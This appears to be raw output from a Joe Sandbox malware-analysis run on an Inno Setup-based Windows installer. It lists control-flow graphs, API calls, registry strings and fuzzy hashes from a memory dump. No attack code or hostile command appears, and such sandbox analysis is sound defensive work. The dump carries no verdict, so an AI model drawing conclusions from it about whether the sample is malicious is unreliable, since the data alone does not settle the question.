                                                                                                      • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                                                      • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                                      • Opcode Fuzzy Hash: f802b11f0c681854f79c5f1da5c1baf03ca951e6abaa2e26ef8ced90cdb9169e
                                                                                                      • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NameUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2645101109-0
                                                                                                      • Opcode ID: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                                      • Instruction ID: 445fb77b721d6e8bc33303137c5d79e403f1e24c04085a252f4bbff9531eb306
                                                                                                      • Opcode Fuzzy Hash: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                                                      • Instruction Fuzzy Hash: 6AD0C271304704A3C700AAA99C825AA35DD8B84315F00483F3CC6DA3C3FABDDA481696
                                                                                                      APIs
                                                                                                      • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F54C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: NtdllProc_Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 4255912815-0
                                                                                                      • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                                                      • Instruction ID: 55aff4e3ab0814f5b97a0c0db1ec4da333d3f7c11773d115dc143ade784a7ab4
                                                                                                      • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                                                      • Instruction Fuzzy Hash: BAD05E7120010C7B9B00DE9CE840C6B33BC9B88700BA08825F918C7202C634ED5187A8

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 406 46f300-46f332 407 46f334-46f33b 406->407 408 46f34f 406->408 409 46f346-46f34d 407->409 410 46f33d-46f344 407->410 411 46f356-46f38e call 403634 call 403738 call 42ded0 408->411 409->411 410->408 410->409 418 46f390-46f3a4 call 403738 call 42ded0 411->418 419 46f3a9-46f3d2 call 403738 call 42ddf4 411->419 418->419 427 46f3d4-46f3dd call 46efd0 419->427 428 46f3e2-46f40b call 46f0ec 419->428 427->428 432 46f41d-46f420 call 403400 428->432 433 46f40d-46f41b call 403494 428->433 437 46f425-46f470 call 46f0ec call 42c40c call 46f134 call 46f0ec 432->437 433->437 446 46f486-46f4a7 call 455588 call 46f0ec 437->446 447 46f472-46f485 call 46f15c 437->447 454 46f4fd-46f504 446->454 455 46f4a9-46f4fc call 46f0ec call 431414 call 46f0ec call 431414 call 46f0ec 446->455 447->446 456 46f506-46f543 call 431414 call 46f0ec call 431414 call 46f0ec 454->456 457 46f544-46f54b 454->457 455->454 456->457 460 46f58c-46f5b1 call 40b44c call 46f0ec 457->460 461 46f54d-46f58b call 46f0ec * 3 457->461 479 46f5b3-46f5be call 47bfd8 460->479 480 46f5c0-46f5c9 call 403494 460->480 461->460 491 46f5ce-46f5d9 call 478d20 479->491 480->491 496 46f5e2 491->496 497 46f5db-46f5e0 491->497 498 46f5e7-46f7b1 call 403778 call 46f0ec call 47bfd8 call 46f134 call 403494 call 40357c * 2 call 46f0ec call 403494 call 40357c * 2 call 46f0ec call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 496->498 497->498 561 46f7c7-46f7d5 call 46f15c 498->561 562 46f7b3-46f7c5 call 46f0ec 498->562 566 46f7da 561->566 567 46f7db-46f824 call 46f15c call 46f190 call 46f0ec call 47bfd8 call 46f1f4 562->567 566->567 578 46f826-46f849 call 46f15c * 2 567->578 579 46f84a-46f857 567->579 578->579 580 46f926-46f92d 579->580 581 46f85d-46f864 579->581 585 46f987-46f99d RegCloseKey 580->585 586 46f92f-46f965 call 4946bc 580->586 583 46f866-46f86d 581->583 584 46f8d1-46f8e0 581->584 583->584 589 46f86f-46f893 call 430bdc 583->589 588 46f8e3-46f8f0 584->588 586->585 592 46f907-46f920 call 430c18 call 46f15c 588->592 593 46f8f2-46f8ff 588->593 589->588 601 46f895-46f896 589->601 604 46f925 592->604 593->592 597 46f901-46f905 593->597 597->580 597->592 603 46f898-46f8be call 40b44c call 47954c 601->603 609 46f8c0-46f8c6 call 430bdc 603->609 610 46f8cb-46f8cd 603->610 604->580 609->610 610->603 612 46f8cf 610->612 612->588
                                                                                                      APIs
                                                                                                        • Part of subcall function 0046F0EC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                                                        • Part of subcall function 0046F15C: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                                                      • RegCloseKey.ADVAPI32(?,0046F9A5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F9F0,?,?,0049C1D0,00000000), ref: 0046F998
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$Close
                                                                                                      • String ID: " /SILENT$5.5.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                                      • API String ID: 3391052094-1769338133
                                                                                                      • Opcode ID: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                                                      • Instruction ID: 138fe2a8aa43a8f2517aa1aee13eacc10811dc4b0cf032f1bf39601b5d09dcc5
                                                                                                      • Opcode Fuzzy Hash: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                                                      • Instruction Fuzzy Hash: 96126331A001089BCB04EB55F891ADE77F5FB49304F60807BE841AB396EB79BD49CB59

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1027 492208-49223c call 403684 1030 49223e-49224d call 446fac Sleep 1027->1030 1031 492252-49225f call 403684 1027->1031 1036 4926e2-4926fc call 403420 1030->1036 1037 49228e-49229b call 403684 1031->1037 1038 492261-492289 call 447008 call 403738 FindWindowA call 447288 1031->1038 1046 4922ca-4922d7 call 403684 1037->1046 1047 49229d-4922c0 call 447008 call 403738 FindWindowA call 447288 1037->1047 1038->1036 1054 4922d9-49231b call 446fac * 4 SendMessageA call 447288 1046->1054 1055 492320-49232d call 403684 1046->1055 1067 4922c5 1047->1067 1054->1036 1064 49237c-492389 call 403684 1055->1064 1065 49232f-492377 call 446fac * 4 PostMessageA call 4470e0 1055->1065 1076 4923d8-4923e5 call 403684 1064->1076 1077 49238b-4923d3 call 446fac * 4 SendNotifyMessageA call 4470e0 1064->1077 1065->1036 1067->1036 1089 492412-49241f call 403684 1076->1089 1090 4923e7-49240d call 447008 call 403738 RegisterClipboardFormatA call 447288 1076->1090 1077->1036 1102 492421-49245b call 446fac * 3 SendMessageA call 447288 1089->1102 1103 492460-49246d call 403684 1089->1103 1090->1036 1102->1036 1115 49246f-4924af call 446fac * 3 PostMessageA call 4470e0 1103->1115 1116 4924b4-4924c1 call 403684 1103->1116 1115->1036 1128 492508-492515 call 403684 1116->1128 1129 4924c3-492503 call 446fac * 3 SendNotifyMessageA call 4470e0 1116->1129 1140 49256a-492577 call 403684 1128->1140 1141 492517-492535 call 447008 call 42e3a4 1128->1141 1129->1036 1151 492579-4925a5 call 447008 call 403738 call 446fac GetProcAddress 1140->1151 1152 4925f1-4925fe call 403684 1140->1152 1158 492547-492555 GetLastError call 447288 1141->1158 1159 492537-492545 call 447288 1141->1159 1183 4925e1-4925ec call 4470e0 1151->1183 1184 4925a7-4925dc call 446fac * 2 call 447288 call 4470e0 1151->1184 1164 492600-492621 call 446fac FreeLibrary call 4470e0 1152->1164 1165 492626-492633 call 403684 1152->1165 1170 49255a-492565 call 447288 1158->1170 1159->1170 1164->1036 1180 492658-492665 call 403684 1165->1180 1181 492635-492653 call 447008 call 403738 CreateMutexA 1165->1181 1170->1036 1191 49269b-4926a8 call 403684 1180->1191 1192 492667-492699 call 48c638 call 403574 call 403738 OemToCharBuffA call 48c650 1180->1192 1181->1036 1183->1036 1184->1036 1204 4926aa-4926dc call 48c638 call 403574 call 403738 CharToOemBuffA call 48c650 1191->1204 1205 4926de 1191->1205 1192->1036 1204->1036 1205->1036
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                                                                      • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FindSleepWindow
                                                                                                      • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                      • API String ID: 3078808852-3310373309
                                                                                                      • Opcode ID: 04389725d469abda592edc5d686fc9dc2997d938da4e0f8a72bd6865d44b9f5f
                                                                                                      • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                                                                      • Opcode Fuzzy Hash: 04389725d469abda592edc5d686fc9dc2997d938da4e0f8a72bd6865d44b9f5f
                                                                                                      • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1589 4834fc-483521 GetModuleHandleA GetProcAddress 1590 483588-48358d GetSystemInfo 1589->1590 1591 483523-483539 GetNativeSystemInfo GetProcAddress 1589->1591 1592 483592-48359b 1590->1592 1591->1592 1593 48353b-483546 GetCurrentProcess 1591->1593 1594 4835ab-4835b2 1592->1594 1595 48359d-4835a1 1592->1595 1593->1592 1602 483548-48354c 1593->1602 1598 4835cd-4835d2 1594->1598 1596 4835a3-4835a7 1595->1596 1597 4835b4-4835bb 1595->1597 1600 4835a9-4835c6 1596->1600 1601 4835bd-4835c4 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1604 48354e-483555 call 452708 1602->1604 1604->1592 1607 483557-483564 GetProcAddress 1604->1607 1607->1592 1608 483566-48357d GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 48357f-483586 1608->1609 1609->1592
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                                                                      • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                      • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                      • API String ID: 2230631259-2623177817
                                                                                                      • Opcode ID: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                                                      • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                                                                      • Opcode Fuzzy Hash: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                                                      • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1615 4690f4-46912c call 47bfd8 1618 469132-469142 call 478d40 1615->1618 1619 46930e-469328 call 403420 1615->1619 1624 469147-46918c call 4078fc call 403738 call 42de2c 1618->1624 1630 469191-469193 1624->1630 1631 469304-469308 1630->1631 1632 469199-4691ae 1630->1632 1631->1619 1631->1624 1633 4691c3-4691ca 1632->1633 1634 4691b0-4691be call 42dd5c 1632->1634 1636 4691f7-4691fe 1633->1636 1637 4691cc-4691ee call 42dd5c call 42dd74 1633->1637 1634->1633 1639 469257-46925e 1636->1639 1640 469200-469225 call 42dd5c * 2 1636->1640 1637->1636 1655 4691f0 1637->1655 1642 4692a4-4692ab 1639->1642 1643 469260-469272 call 42dd5c 1639->1643 1662 469227-469230 call 431508 1640->1662 1663 469235-469247 call 42dd5c 1640->1663 1645 4692e6-4692fc RegCloseKey 1642->1645 1646 4692ad-4692e1 call 42dd5c * 3 1642->1646 1656 469274-46927d call 431508 1643->1656 1657 469282-469294 call 42dd5c 1643->1657 1646->1645 1655->1636 1656->1657 1657->1642 1670 469296-46929f call 431508 1657->1670 1662->1663 1663->1639 1672 469249-469252 call 431508 1663->1672 1670->1642 1672->1639
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                                                                      Strings
                                                                                                      • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                                                                      • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                                                                      • Inno Setup: Selected Tasks, xrefs: 00469263
                                                                                                      • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                                                                      • Inno Setup: No Icons, xrefs: 004691DF
                                                                                                      • Inno Setup: App Path, xrefs: 004691B6
                                                                                                      • Inno Setup: Icon Group, xrefs: 004691D2
                                                                                                      • Inno Setup: User Info: Name, xrefs: 004692B3
                                                                                                      • Inno Setup: Setup Type, xrefs: 00469206
                                                                                                      • Inno Setup: Deselected Components, xrefs: 00469238
                                                                                                      • %s\%s_is1, xrefs: 00469171
                                                                                                      • Inno Setup: Selected Components, xrefs: 00469216
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      • API String ID: 47109696-1093091907
                                                                                                      • Opcode ID: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                                                      • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                                                                      • Opcode Fuzzy Hash: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                                                      • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59

                                                                                                      Control-flow Graph

                                                                                                      control_flow_graph 1944 47cb30-47cb86 call 42c40c call 4035c0 call 47c7a8 call 4525c4 1953 47cb92-47cba1 call 4525c4 1944->1953 1954 47cb88-47cb8d call 453330 1944->1954 1958 47cba3-47cba9 1953->1958 1959 47cbbb-47cbc1 1953->1959 1954->1953 1960 47cbcb-47cbd3 call 403494 1958->1960 1961 47cbab-47cbb1 1958->1961 1962 47cbc3-47cbc9 1959->1962 1963 47cbd8-47cc00 call 42e3a4 * 2 1959->1963 1960->1963 1961->1959 1964 47cbb3-47cbb9 1961->1964 1962->1960 1962->1963 1970 47cc27-47cc41 GetProcAddress 1963->1970 1971 47cc02-47cc22 call 4078fc call 453330 1963->1971 1964->1959 1964->1960 1973 47cc43-47cc48 call 453330 1970->1973 1974 47cc4d-47cc6a call 403400 * 2 1970->1974 1971->1970 1973->1974
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(74600000,SHGetFolderPathA), ref: 0047CC32
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                      • API String ID: 190572456-1821436788
                                                                                                      • Opcode ID: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                                                      • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                                                                      • Opcode Fuzzy Hash: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                                                      • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D

Control-flow Graph
control_flow_graph 1982 406334-40634e GetModuleHandleA GetProcAddress 1983 406350 1982->1983 1984 406357-406364 GetProcAddress 1982->1984 1983->1984 1985 406366 1984->1985 1986 40636d-40637a GetProcAddress 1984->1986 1985->1986 1987 406380-406381 1986->1987 1988 40637c-40637e SetProcessDEPPolicy 1986->1988 1988->1987
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
• GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
• GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
• SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
Strings
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: AddressProc$HandleModulePolicyProcess
• String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
• API String ID: 3256987805-3653653586
• Opcode ID: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
• Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
• Opcode Fuzzy Hash: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
• Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

Control-flow Graph
control_flow_graph 2618 423884-42388e 2619 4239b7-4239bb 2618->2619 2620 423894-4238b6 call 41f3d4 GetClassInfoA 2618->2620 2623 4238e7-4238f0 GetSystemMetrics 2620->2623 2624 4238b8-4238cf RegisterClassA 2620->2624 2626 4238f2 2623->2626 2627 4238f5-4238ff GetSystemMetrics 2623->2627 2624->2623 2625 4238d1-4238e2 call 408cc4 call 40311c 2624->2625 2625->2623 2626->2627 2628 423901 2627->2628 2629 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2627->2629 2628->2629 2641 423962-423975 call 424188 SendMessageA 2629->2641 2642 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2629->2642 2641->2642 2642->2619 2644 4239aa-4239b2 DeleteMenu 2642->2644 2644->2619
APIs
  • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
• GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
• RegisterClassA.USER32(00499630), ref: 004238C7
• GetSystemMetrics.USER32(00000000), ref: 004238E9
• GetSystemMetrics.USER32(00000001), ref: 004238F8
• SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
• SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
• GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
• DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
